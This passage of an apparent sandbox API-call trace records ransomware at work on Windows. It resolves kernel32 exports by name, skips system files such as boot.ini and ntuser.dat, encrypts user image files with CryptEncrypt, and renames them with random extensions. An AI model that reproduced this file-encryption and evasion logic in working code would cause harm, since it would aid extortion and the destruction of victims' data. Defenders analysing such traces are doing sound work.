(lpString="DELETEFILETRANSACTEDW") returned 21 [0086.353] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0086.353] lstrlenA (lpString="DELETEFILEW") returned 11 [0086.353] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0086.353] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0086.353] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0086.353] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0086.353] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0086.353] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0086.353] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0086.353] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0086.353] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0086.353] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0086.353] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0086.353] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0086.353] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0086.353] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0086.353] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0086.353] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0086.353] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0086.353] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0086.353] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0086.353] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0086.353] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0086.353] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0086.353] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0086.353] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0086.353] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0086.353] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0086.353] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0086.353] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0086.353] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0086.353] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0086.353] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0086.354] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0086.354] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0086.354] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0086.354] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0086.354] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0086.354] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0086.354] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0086.354] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0086.354] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0086.354] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0086.354] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0086.354] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0086.354] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0086.354] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0086.354] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0086.354] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0086.354] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0086.354] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0086.354] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0086.354] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0086.354] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0086.354] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0086.354] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0086.354] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0086.354] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0086.354] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0086.354] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0086.354] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0086.354] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0086.354] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0086.354] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0086.354] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0086.354] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0086.354] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0086.354] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0086.354] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0086.355] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0086.355] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\twKvLTg.gif") returned 61 [0086.355] wsprintfW (in: param_1=0x3f2dc28, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\twKvLTg.gif.Myf47O") returned 68 [0086.355] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\twKvLTg.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\h371\\twkvltg.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\twKvLTg.gif.Myf47O" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\h371\\twkvltg.gif.myf47o"), dwFlags=0x0) returned 1 [0086.355] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.356] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.356] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.356] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ed74a60, ftCreationTime.dwHighDateTime=0x1d4d4da, ftLastAccessTime.dwLowDateTime=0x2ffc6030, ftLastAccessTime.dwHighDateTime=0x1d4d4f2, ftLastWriteTime.dwLowDateTime=0x2ffc6030, ftLastWriteTime.dwHighDateTime=0x1d4d4f2, nFileSizeHigh=0x0, nFileSizeLow=0x1442b, dwReserved0=0x0, dwReserved1=0x0, cFileName="twKvLTg.gif", cAlternateFileName="")) returned 0 [0086.356] FindClose (in: hFindFile=0x5f8b18 | out: hFindFile=0x5f8b18) returned 1 [0086.356] CloseHandle (hObject=0x428) returned 1 [0086.356] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36553fd0, ftCreationTime.dwHighDateTime=0x1d4d491, ftLastAccessTime.dwLowDateTime=0x587c3ab0, ftLastAccessTime.dwHighDateTime=0x1d4c68a, ftLastWriteTime.dwLowDateTime=0x587c3ab0, ftLastWriteTime.dwHighDateTime=0x1d4c68a, nFileSizeHigh=0x0, nFileSizeLow=0x6d21, dwReserved0=0x0, dwReserved1=0x0, cFileName="ixqs-N95mkCcdeR5.gif", cAlternateFileName="IXQS-N~1.GIF")) returned 1 [0086.356] lstrcmpiW (lpString1="ixqs-N95mkCcdeR5.gif", lpString2="DECRYPT-FILES.txt") returned 1 [0086.356] lstrcmpiW (lpString1="ixqs-N95mkCcdeR5.gif", lpString2="autorun.inf") returned 1 [0086.356] lstrcmpiW (lpString1="ixqs-N95mkCcdeR5.gif", lpString2="boot.ini") returned 1 [0086.357] lstrcmpiW (lpString1="ixqs-N95mkCcdeR5.gif", lpString2="desktop.ini") returned 1 [0086.357] lstrcmpiW (lpString1="ixqs-N95mkCcdeR5.gif", lpString2="ntuser.dat") returned -1 [0086.357] lstrcmpiW (lpString1="ixqs-N95mkCcdeR5.gif", lpString2="iconcache.db") returned 1 [0086.357] lstrcmpiW (lpString1="ixqs-N95mkCcdeR5.gif", lpString2="bootsect.bak") returned 1 [0086.357] lstrcmpiW (lpString1="ixqs-N95mkCcdeR5.gif", lpString2="ntuser.dat.log") returned -1 [0086.357] lstrcmpiW (lpString1="ixqs-N95mkCcdeR5.gif", lpString2="thumbs.db") returned -1 [0086.357] lstrcmpiW (lpString1="ixqs-N95mkCcdeR5.gif", lpString2="Bootfont.bin") returned 1 [0086.357] lstrlenW (lpString="ixqs-N95mkCcdeR5.gif") returned 20 [0086.357] lstrcmpiW (lpString1="gif", lpString2="lnk") returned -1 [0086.357] lstrcmpiW (lpString1="gif", lpString2="exe") returned 1 [0086.357] lstrcmpiW (lpString1="gif", lpString2="sys") returned -1 [0086.357] lstrcmpiW (lpString1="gif", lpString2="dll") returned 1 [0086.357] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned 45 [0086.357] lstrlenW (lpString="ixqs-N95mkCcdeR5.gif") returned 20 [0086.357] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" [0086.357] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpString2="ixqs-N95mkCcdeR5.gif" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\ixqs-N95mkCcdeR5.gif") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\ixqs-N95mkCcdeR5.gif" [0086.357] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.357] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\ixqs-N95mkCcdeR5.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\ixqs-n95mkccder5.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0086.357] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=27937) returned 1 [0086.357] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0086.358] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0086.358] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0086.358] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0086.358] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.358] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0086.358] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0086.359] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.359] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0086.360] CloseHandle (hObject=0x42c) returned 1 [0086.360] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.360] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0086.361] CloseHandle (hObject=0x0) returned 0 [0086.361] CloseHandle (hObject=0x428) returned 1 [0086.361] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.361] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.361] GetTickCount () returned 0x114e0af [0086.361] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.362] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0086.362] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0086.362] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.362] lstrlenA (lpString="kernel32.dll") returned 12 [0086.362] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0086.362] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0086.362] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0086.362] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0086.363] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0086.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0086.363] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0086.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0086.363] lstrlenA (lpString="ADDATOMA") returned 8 [0086.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0086.363] lstrlenA (lpString="ADDATOMW") returned 8 [0086.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0086.363] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0086.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0086.363] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0086.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0086.363] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0086.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0086.363] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0086.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0086.363] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0086.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0086.363] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0086.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0086.363] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0086.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0086.363] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0086.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0086.363] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0086.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0086.363] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0086.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0086.363] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0086.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0086.363] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0086.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0086.363] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0086.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0086.363] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0086.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0086.364] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0086.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0086.364] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0086.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0086.364] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0086.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0086.364] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0086.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0086.364] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0086.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0086.364] lstrlenA (lpString="BACKUPREAD") returned 10 [0086.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0086.364] lstrlenA (lpString="BACKUPSEEK") returned 10 [0086.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0086.364] lstrlenA (lpString="BACKUPWRITE") returned 11 [0086.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0086.364] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0086.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0086.364] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0086.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0086.364] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0086.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0086.364] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0086.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0086.364] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0086.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0086.364] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0086.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0086.364] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0086.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0086.364] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0086.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0086.364] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0086.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0086.364] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0086.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0086.365] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0086.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0086.365] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0086.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0086.365] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0086.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0086.365] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0086.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0086.365] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0086.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0086.365] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0086.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0086.365] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0086.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0086.365] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0086.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0086.365] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0086.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0086.365] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0086.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") 